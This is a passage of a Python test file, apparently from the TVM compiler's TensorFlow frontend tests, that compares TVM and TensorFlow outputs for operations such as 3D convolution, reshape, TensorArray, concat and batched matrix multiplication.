_test_convolution(
"conv",
[4, 8, 8, 16],
[1, 1, 16, 32],
[1, 1],
[1, 1],
[[0, 0], [2, 3], [0, 1], [0, 0]],
"NHWC",
)
_test_convolution(
"depthwise",
[4, 8, 8, 16],
[1, 1, 16, 1],
[1, 1],
[1, 1],
[[0, 0], [2, 3], [0, 1], [0, 0]],
"NHWC",
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
[[0, 0], [1, 0], [1, 0], [0, 0]],
"NHWC",
[4, 16, 16, 176],
)
#######################################################################
# Convolution3D
# -------------
def _test_convolution3d(
opname,
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
deconv_output_shape=[],
add_shapes_to_graph_def=True,
):
""" One iteration of 3D convolution with given shapes and attributes """
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
if data_format == "NDHWC":
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
else:
strides = [1, 1] + strides
dilations = [1, 1] + dilations
if opname == "conv":
nn_ops.conv3d(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Conv3D:0",
cuda_layout="NCDHW",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution3d():
if is_gpu_available():
_test_convolution3d(
"conv", [4, 176, 8, 8, 8], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
)
_test_convolution3d(
"conv", [4, 19, 17, 17, 17], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
)
_test_convolution3d(
"conv", [4, 124, 17, 17, 17], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
)
_test_convolution3d(
"conv", [4, 12, 17, 17, 17], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
)
_test_convolution3d(
"conv", [4, 8, 8, 8, 176], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 19], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 124], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 12], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
)
# Test without adding shapes to graph def
_test_convolution3d(
"conv",
[4, 17, 17, 17, 12],
[3, 3, 3, 12, 32],
[1, 1, 1],
[2, 2, 2],
"VALID",
"NDHWC",
add_shapes_to_graph_def=False,
)
#######################################################################
# Convolution3D Transpose
# -----------------------
def _test_convolution3d_transpose(
data_shape,
filter_shape,
strides,
padding,
output_shape,
data_format="NCDHW",
add_shapes_to_graph_def=True,
):
""" One iteration of 3D convolution transpose with given shapes and attributes """
dtype = "float32"
data_array = np.random.uniform(size=data_shape).astype(dtype)
filter_array = np.random.uniform(size=filter_shape).astype(dtype)
if data_format == "NDHWC":
strides = [1] + strides + [1]
else:
strides = [1, 1] + strides
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data_shape, dtype=dtype)
in_filter = constant_op.constant(filter_array, shape=filter_shape, dtype=dtype)
nn_ops.conv3d_transpose(
in_data,
in_filter,
output_shape=output_shape,
strides=strides,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
data_array,
"Placeholder:0",
"conv3d_transpose:0",
cuda_layout="NDHWC",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution3d_transpose():
if is_gpu_available():
_test_convolution3d_transpose(
data_shape=[1, 10, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 10],
strides=[1, 1, 1],
padding="VALID",
output_shape=[1, 6, 8, 8, 8],
)
_test_convolution3d_transpose(
data_shape=[4, 9, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 9],
strides=[1, 1, 1],
padding="VALID",
output_shape=[4, 6, 8, 8, 8],
)
_test_convolution3d_transpose(
data_shape=[1, 3, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 3],
strides=[2, 2, 2],
padding="SAME",
output_shape=[1, 6, 15, 15, 15],
)
_test_convolution3d_transpose(
data_shape=[1, 16, 8, 8, 8],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 6, 24, 24, 24],
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 10],
filter_shape=[1, 1, 1, 6, 10],
strides=[1, 1, 1],
padding="VALID",
output_shape=[1, 8, 8, 8, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[4, 8, 8, 8, 9],
filter_shape=[1, 1, 1, 6, 9],
strides=[1, 1, 1],
padding="VALID",
output_shape=[4, 8, 8, 8, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 3],
filter_shape=[1, 1, 1, 6, 3],
strides=[2, 2, 2],
padding="SAME",
output_shape=[1, 15, 15, 15, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 16],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 24, 24, 24, 6],
data_format="NDHWC",
)
# Test without adding shapes to graph def
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 16],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 24, 24, 24, 6],
data_format="NDHWC",
add_shapes_to_graph_def=False,
)
#######################################################################
# BiasAdd
# -----------
def _test_biasadd(tensor_in_sizes, data_format):
""" One iteration of biasadd with given shapes and attributes """
total_size_1 = 1
for s in tensor_in_sizes:
total_size_1 *= s
tensor_bias_sizes = [tensor_in_sizes[1]] if data_format == "NCHW" else [tensor_in_sizes[3]]
total_size_2 = tensor_bias_sizes[0]
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
bias_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_bias = constant_op.constant(bias_array, shape=tensor_bias_sizes, dtype="float32")
nn_ops.bias_add(in_data, in_bias, data_format=data_format)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"), "Placeholder:0", "BiasAdd:0"
)
@tvm.testing.uses_gpu
def test_forward_biasadd():
if is_gpu_available():
_test_biasadd([4, 176, 8, 8], "NCHW")
_test_biasadd([1, 100, 1, 1], "NCHW")
_test_biasadd([4, 19, 17, 17], "NCHW")
_test_biasadd([4, 124, 3, 3], "NCHW")
_test_biasadd([4, 8, 8, 176], "NHWC")
_test_biasadd([1, 1, 1, 100], "NHWC")
_test_biasadd([4, 17, 17, 19], "NHWC")
_test_biasadd([4, 3, 3, 124], "NHWC")
def _test_forward_where(input_shape):
with tf.Graph().as_default():
dtype = tf.float32
t = tf.constant(
np.random.choice([0, 1, -2, 3, -1, 0.1, -0.2], size=input_shape).astype(dtype.name)
)
out = tf.where(t)
compare_tf_with_tvm([], [], out.name, mode="debug")
compare_tf_with_tvm([], [], out.name, mode="vm")
def test_forward_argwhere():
_test_forward_where((5,))
_test_forward_where((5, 5))
_test_forward_where((5, 5, 5))
_test_forward_where((5, 5, 5, 5))
_test_forward_where((5, 5, 5, 5, 5))
#######################################################################
# SpaceToBatchND
# --------------
def _test_space_to_batch_nd(input_shape, block_shape, paddings, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
out = tf.space_to_batch_nd(in_data, block_shape, paddings)
compare_tf_with_tvm(data, in_data.name, out.name)
def _test_space_to_batch_nd_infer_paddings(input_shape, block_shape, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
padding_np = np.array([0, 1]).astype(np.int32).reshape((1, 2))
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
const1 = tf.constant(padding_np, dtype=tf.int32)
        # make paddings the output of another op (tf.reverse here) rather than a direct
        # graph input, so it can be extracted with infer_value_simulated
paddings = tf.reverse(const1, axis=[-1])
out = tf.space_to_batch_nd(in_data, block_shape, paddings)
compare_tf_with_tvm(data, in_data.name, out.name)
def test_forward_space_to_batch_nd():
# test cases: https://www.tensorflow.org/api_docs/cc/class/tensorflow/ops/space-to-batch-n-d
_test_space_to_batch_nd(input_shape=[1, 2, 2, 1], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(input_shape=[1, 2, 2, 3], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(input_shape=[1, 4, 4, 1], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(
input_shape=[2, 2, 4, 1], block_shape=[2, 2], paddings=[[0, 0], [2, 0]], dtype="int64"
)
# pylint: disable=line-too-long
# https://github.com/tensorflow/tensorflow/blob/24f578/tensorflow/python/kernel_tests/spacetobatch_op_test.py
_test_space_to_batch_nd(input_shape=[2, 3], block_shape=[2], paddings=[[1, 0]], dtype="float32")
_test_space_to_batch_nd(
input_shape=[2, 3, 2], block_shape=[2], paddings=[[1, 0]], dtype="float64"
)
_test_space_to_batch_nd_infer_paddings(input_shape=[2, 3, 2], block_shape=[2])
#######################################################################
# BatchToSpaceND
# --------------
def _test_batch_to_space_nd(input_shape, block_shape, crops, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
out = tf.batch_to_space_nd(in_data, block_shape, crops)
compare_tf_with_tvm(data, in_data.name, out.name)
def test_forward_batch_to_space_nd():
# test cases: https://www.tensorflow.org/api_docs/cc/class/tensorflow/ops/batch-to-space-n-d
_test_batch_to_space_nd(input_shape=[4, 1, 1, 1], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(input_shape=[4, 1, 1, 3], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(input_shape=[4, 2, 2, 1], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(
input_shape=[8, 1, 3, 1], block_shape=[2, 2], crops=[[0, 0], [2, 0]], dtype="int64"
)
# pylint: disable=line-too-long
# https://github.com/tensorflow/tensorflow/blob/24f578/tensorflow/python/kernel_tests/batchtospace_op_test.py
_test_batch_to_space_nd(
input_shape=[18, 2, 1, 2], block_shape=[2, 3], crops=[[1, 1], [0, 0]], dtype="float32"
)
_test_batch_to_space_nd(
input_shape=[20, 5, 8, 7], block_shape=[2, 2], crops=[[1, 1], [1, 1]], dtype="float64"
)
#######################################################################
# Reshape
# -------
def _test_reshape(data, out_shape):
""" One iteration of reshape operation with given data and out shape """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_with_call():
""" relay.expr.Call as shape """
data = np.zeros((6, 4, 2))
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
out_shape = tf.constant([1, 2, 3], dtype="int32")
out_shape = tf.multiply(out_shape, 2)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_like(data, shape_like):
""" A special case for reshape. """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
in_shape_like = array_ops.placeholder(shape=shape_like.shape, dtype=data.dtype)
out_shape = array_ops.shape(in_shape_like)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_symbolic(data, a_data, b_data):
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
a = array_ops.placeholder(shape=a_data.shape, dtype=a_data.dtype)
b = array_ops.placeholder(shape=b_data.shape, dtype=b_data.dtype)
newshape = tf.add(a, b)
out = array_ops.reshape(in_data, newshape)
for mode in ["debug", "vm"]:
compare_tf_with_tvm(
[data, a_data, b_data], [in_data.name, a.name, b.name], out.name, mode=mode
)
def test_forward_reshape():
_test_reshape(np.arange(6.0), [2, 3])
_test_reshape(np.arange(6), [-1, 2])
_test_reshape(np.arange(6), [3, -1])
_test_reshape(np.arange(6), [-1])
_test_reshape_with_call()
_test_reshape_like(np.zeros((3, 6)), np.zeros((9, 2)))
_test_reshape_symbolic(np.arange(6.0), np.array([2, 0]), np.array([0, 3]))
_test_reshape_symbolic(np.arange(6), np.array([-1, 0]), np.array([0, 2]))
_test_reshape_symbolic(np.arange(6), np.array([3, 0]), np.array([3, -1]))
_test_reshape_symbolic(np.arange(6), np.array([0]), np.array([-1]))
#######################################################################
# DepthToSpace
# ------------
def _test_depthtospace(data, block_size):
""" One iteration of depth_to_space operation with given data and block size """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.depth_to_space(in_data, block_size)
compare_tf_with_tvm(data, "Placeholder:0", "DepthToSpace:0")
def test_forward_depthtospace():
_test_depthtospace(np.random.normal(size=[1, 32, 32, 4]), 2)
_test_depthtospace(np.random.normal(size=[1, 16, 8, 32]), 4)
#######################################################################
# SpaceToDepth
# ------------
def _test_spacetodepth(data, block_size):
""" One iteration of space_to_depth operation with given data and block size """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.space_to_depth(in_data, block_size)
compare_tf_with_tvm(data, "Placeholder:0", "SpaceToDepth:0")
def test_forward_spacetodepth():
_test_spacetodepth(np.random.normal(size=[1, 32, 32, 4]), 2)
_test_spacetodepth(np.random.normal(size=[1, 16, 8, 32]), 4)
#######################################################################
# Squeeze
# -------
def _test_squeeze(data, squeeze_dims=None):
""" One iteration of squeeze """
if squeeze_dims is None:
squeeze_dims = []
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
if squeeze_dims:
array_ops.squeeze(in_data, squeeze_dims)
else:
array_ops.squeeze(in_data)
compare_tf_with_tvm(data, "Placeholder:0", "Squeeze:0")
def test_forward_squeeze():
""" Squeeze """
# Nothing to squeeze.
_test_squeeze(np.arange(2).reshape((2)))
_test_squeeze(np.arange(6).reshape((2, 3)))
# Squeeze the middle element away.
_test_squeeze(np.arange(4).reshape((2, 1, 2)))
# Squeeze on both ends.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)))
# Positive squeeze dim index.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [0])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [2, 4])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [0, 4, 2])
# Negative squeeze dim index.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-1])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-3, -5])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-3, -5, -1])
#######################################################################
# TensorArray
# -----------
def test_tensor_array_write_read():
def run(dtype_str, infer_shape, element_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
np_data = np.array([[1.0, 2.0], [3.0, 4.0]]).astype(dtype_str)
in_data = [np_data, np_data]
t1 = tf.constant(np_data, dtype=dtype)
t2 = tf.constant(np_data, dtype=dtype)
ta1 = tf.TensorArray(
dtype=dtype, size=2, infer_shape=infer_shape, element_shape=element_shape
)
ta2 = ta1.write(0, t1)
ta3 = ta2.write(1, t2)
out = ta3.read(0)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], "TensorArrayReadV3:0", mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, False, None)
run(dtype, False, tf.TensorShape([None, 2]))
run(dtype, True, None)
def test_tensor_array_scatter():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
if infer_shape:
element_shape = tf.TensorShape([tf.Dimension(None)])
else:
element_shape = None
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str), dtype=dtype)
indices = tf.constant([2, 1, 0])
ta1 = tf.TensorArray(
dtype=dtype, size=3, infer_shape=infer_shape, element_shape=element_shape
)
ta2 = ta1.scatter(indices, t)
out0 = ta2.read(0)
out1 = ta2.read(1)
out2 = ta2.read(2)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayReadV3:0"], mode="vm")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_1:0"], mode="vm")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_gather():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str))
scatter_indices = tf.constant([2, 1, 0])
gather_indices = tf.constant([1, 2])
ta1 = tf.TensorArray(dtype=dtype, size=3, infer_shape=infer_shape)
ta2 = ta1.scatter(scatter_indices, t)
t1 = ta2.gather(gather_indices)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayGatherV3:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, True)
def test_tensor_array_split():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(
np.array([[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0]]).astype(
dtype_str
),
dtype=dtype,
)
split_length = tf.constant([2, 2, 2, 2], dtype=tf.int32)
ta1 = tf.TensorArray(dtype=dtype, size=4, infer_shape=infer_shape)
ta2 = ta1.split(t, split_length)
out0 = ta2.read(0)
out1 = ta2.read(1)
out2 = ta2.read(2)
out3 = ta2.read(3)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayReadV3:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_1:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_3:0"], mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_concat():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(
np.array([[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0]]).astype(
dtype_str
),
dtype=dtype,
)
split_length = tf.constant([2, 2, 2, 2], dtype=tf.int32)
ta1 = tf.TensorArray(dtype=dtype, size=4, infer_shape=infer_shape)
ta2 = ta1.split(t, split_length)
t = ta2.concat()
out = tf.identity(t)
compare_tf_with_tvm([], [], ["Identity:0"], mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_size():
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
np_data = np.array([[1.0, 2.0], [3.0, 4.0]]).astype(dtype_str)
in_data = [np_data, np_data]
t1 = tf.constant(np_data, dtype=dtype)
t2 = tf.constant(np_data, dtype=dtype)
ta1 = tf.TensorArray(dtype=dtype, size=2, infer_shape=infer_shape)
ta2 = ta1.write(0, t1)
ta3 = ta2.write(1, t2)
out = ta3.size()
g = tf.get_default_graph()
compare_tf_with_tvm([], [], "TensorArraySizeV3:0", mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_stack():
def run(dtype_str, infer_shape):
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str))
scatter_indices = tf.constant([2, 1, 0])
ta1 = tf.TensorArray(dtype=dtype, size=3, infer_shape=infer_shape)
ta2 = ta1.scatter(scatter_indices, t)
t1 = ta2.stack()
print(t1)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayStack/TensorArrayGatherV3:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, True)
def test_tensor_array_unstack():
def run(dtype_str, input_shape, infer_shape):
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.random.choice([0, 1, 2, 3], size=input_shape).astype(dtype.name))
ta1 = tf.TensorArray(dtype=dtype, infer_shape=infer_shape, size=input_shape[0])
ta2 = ta1.unstack(t)
out0 = ta2.size()
out1 = ta2.read(0)
compare_tf_with_tvm([], [], "TensorArraySizeV3:0", mode="debug")
compare_tf_with_tvm([], [], "TensorArrayReadV3:0", mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, (5,), False)
run(dtype, (5, 5), True)
run(dtype, (5, 5, 5), False)
run(dtype, (5, 5, 5, 5), True)
#######################################################################
# ConcatV2
# --------
def _test_concat_v2(shape1, shape2, dim):
""" One iteration of ConcatV2 """
with tf.Graph().as_default():
dtype = "float32"
in1 = tf.placeholder(shape=shape1, dtype=dtype, name="in1")
in2 = tf.placeholder(shape=shape2, dtype=dtype, name="in2")
array_ops.concat_v2([in1, in2], dim)
np_data1 = np.random.uniform(size=shape1).astype(dtype)
np_data2 = np.random.uniform(size=shape2).astype(dtype)
compare_tf_with_tvm([np_data1, np_data2], ["in1:0", "in2:0"], "ConcatV2:0")
def test_forward_concat_v2():
if tf.__version__ < LooseVersion("1.4.1"):
return
_test_concat_v2([2, 3], [2, 3], 0)
_test_concat_v2([10, 3, 5], [2, 3, 5], 0)
_test_concat_v2([2, 3], [2, 3], 1)
_test_concat_v2([5, 8], [5, 4], 1)
_test_concat_v2([2, 8, 5], [2, 8, 6], -1)
#######################################################################
# Sigmoid
# -------
def _test_sigmoid(data):
""" One iteration of sigmoid """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
sigmoid_out = math_ops.sigmoid(in_data)
compare_tf_with_tvm(data, "Placeholder:0", "Sigmoid:0")
def test_forward_sigmoid():
""" Sigmoid """
_test_sigmoid(np.random.uniform(size=(3, 4, 4, 3)).astype("float32"))
#######################################################################
# Argmin/Argmax
# -------------
def _test_argx(func, data, **kwargs):
with tf.Graph().as_default():
inp = array_ops.placeholder(shape=data.shape, dtype=data.dtype, name="c0")
func(inp, name="argx0", **kwargs)
compare_tf_with_tvm(data, "c0:0", "argx0:0")
def test_forward_argminmax():
for output_type in [tf.int64, tf.int32]:
for axis in [None, 0, 1, 2]:
data = np.random.uniform(size=(8, 4, 9)).astype("float32")
_test_argx(tf.argmax, data=data, axis=axis, output_type=output_type)
_test_argx(tf.argmin, data=data, axis=axis, output_type=output_type)
#######################################################################
# Variable
# --------
def _test_variable(data):
""" One iteration of a variable """
tf.reset_default_graph()
with tf.Graph().as_default():
input_op = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
input_tensor = array_ops.reshape(input_op, data.shape)
size = input_tensor.shape.dims[1]
with variable_scope.variable_scope("linear", reuse=None):
w = variable_scope.get_variable("w", shape=[size, size], dtype=input_tensor.dtype)
math_ops.matmul(input_tensor, w)
compare_tf_with_tvm(data, "Placeholder:0", "MatMul:0", init_global_variables=True)
def test_forward_variable():
"""Variable type op test"""
_test_variable(np.random.uniform(size=(32, 100)).astype("float32"))
@tvm.testing.parametrize_targets("llvm", "cuda")
def test_read_variable_op(target, dev):
""" Read Variable op test """
tf.reset_default_graph()
data = np.random.uniform(size=(32, 100)).astype("float32")
input_tensor = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
size = input_tensor.shape.dims[1]
var_data = np.random.uniform(-5, 5, size=[size, size]).astype(np.float32)
input_var = tf.Variable(var_data, name="var1", use_resource=True)
math_ops.matmul(input_tensor, input_var)
out_name = ["MatMul:0"]
out_node = ["MatMul"]
in_name = ["Placeholder:0"]
in_node = ["Placeholder"]
in_data = [data]
with tf.Session() as sess:
sess.run(variables.global_variables_initializer())
final_graph_def = sess.graph.as_graph_def(add_shapes=True)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
shape_dict = {e: i.shape for e, i in zip(in_name, in_data)}
with pytest.raises(Exception) as execinfo:
mod, params = relay.frontend.from_tensorflow(
final_graph_def, layout=None, shape=shape_dict, outputs=None
)
assert execinfo.value.args[0].startswith("Graph is not frozen. Provide a frozen graph")
# Now convert the variables to constant and run inference on the converted graph
final_graph_def = tf.graph_util.convert_variables_to_constants(
sess,
sess.graph.as_graph_def(add_shapes=True),
out_node,
)
tvm_output = run_tvm_graph(
final_graph_def,
in_data,
in_node,
target=target,
out_names=out_name,
num_output=len(out_name),
)
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-4, rtol=1e-5)
sess.close()
#######################################################################
# MatMul, BatchMatMul, BatchMatMulV2
# ----------------------------------
def _test_matmul(i, j, k, dtype, outer=None):
""" One iteration of matmul """
A_shape_init = [i, j]
B_shape_init = [j, k]
for transpose_a in [False, True]:
for transpose_b in [False, True]:
outer = outer or []
A_shape = outer + (A_shape_init[::-1] if transpose_a else A_shape_init)
B_shape = outer + (B_shape_init[::-1] if transpose_b else B_shape_init)
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, transpose_a=transpose_a, transpose_b=transpose_b)
A_np = np.random.uniform(high=5.0, size=A_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([A_np, B_np], [A.name, B.name], result.name)
def test_forward_matmul():
""" MatMul op test"""
_test_matmul(1, 3, 6, "int32")
_test_matmul(5, 3, 1, "float64")
def _test_batch_matmul(A_shape, B_shape, dtype, adjoint_a=False, adjoint_b=False):
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b, name="batchmatmul")
A_np = np.random.uniform(high=5.0, size=A_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([A_np, B_np], [A.name, B.name], result.name)
def _test_batch_matmul_dynamic(
A_shape, B_shape, A_np_shape, B_np_shape, dtype, adjoint_a=False, adjoint_b=False
):
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b, name="batchmatmul")
A_np = np.random.uniform(high=5.0, size=A_np_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_np_shape).astype(dtype)
        # For now, in TOPI only the cuBLAS implementation supports dynamic shapes.
        # TODO add support for more backends in TOPI
compare_tf_with_tvm(
[A_np, B_np], [A.name, B.name], result.name, mode="vm", targets=["cuda -libs=cublas"]
)
def test_forward_batch_matmul():
""" TF op BatchMatMul, BatchMatMulV2 test"""
_test_batch_matmul((3, 5, 4), (3, 4, 5), "int32")
_test_batch_matmul((3, 5, 4), (3, 4, 5), "float32", True, True)
_test_batch_matmul((3, 5, 4), (3, 5, 4), "int32", True, False)
_test_batch_matmul((3, 5, 4), (3, 5, 4), "float32", False, True)
_test_batch_matmul((2, 3, 4, 5, 6), (2, 3, 4, 6, 5), "int32")
_test_batch_matmul((1, 2, 3, 4, 5, 6), (1, 2, 3, 4, 6, 5), "float32", True, True)
_test_batch_matmul((3, 4, 5, 6), (3, 4, 5, 6), "int32", True, False)
_test_batch_matmul((2, 3, 4, 2, 3, 4, 5, 6), (2, 3, 4, 2, 3, 4, 5, 6), "float32", False, True)
@tvm.testing.requires_cuda
def test_forward_batch_matmul_dynamic():
_test_batch_matmul_dynamic((None, 5, 4), (None, 4, 5), (3, 5, 4), (3, 4, 5), "int32")
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 4, 5), (3, 5, 4), (3, 4, 5), "float32", True, True
)
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 5, 4), (3, 5, 4), (3, 5, 4), "int32", True, False
)
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 5, 4), (3, 5, 4), (3, 5, 4), "float32", False, True
)
_test_batch_matmul_dynamic(
(None, 4, 5, 6), (None, 4, 6, 5), (3, 4, 5, 6), (3, 4, 6, 5), "float32"
)
_test_batch_matmul_dynamic(
(None, None, 5, 6), (None, None, 6, 5), (3, 4, 5, 6), (3, 4, 6, 5), "float32"
)
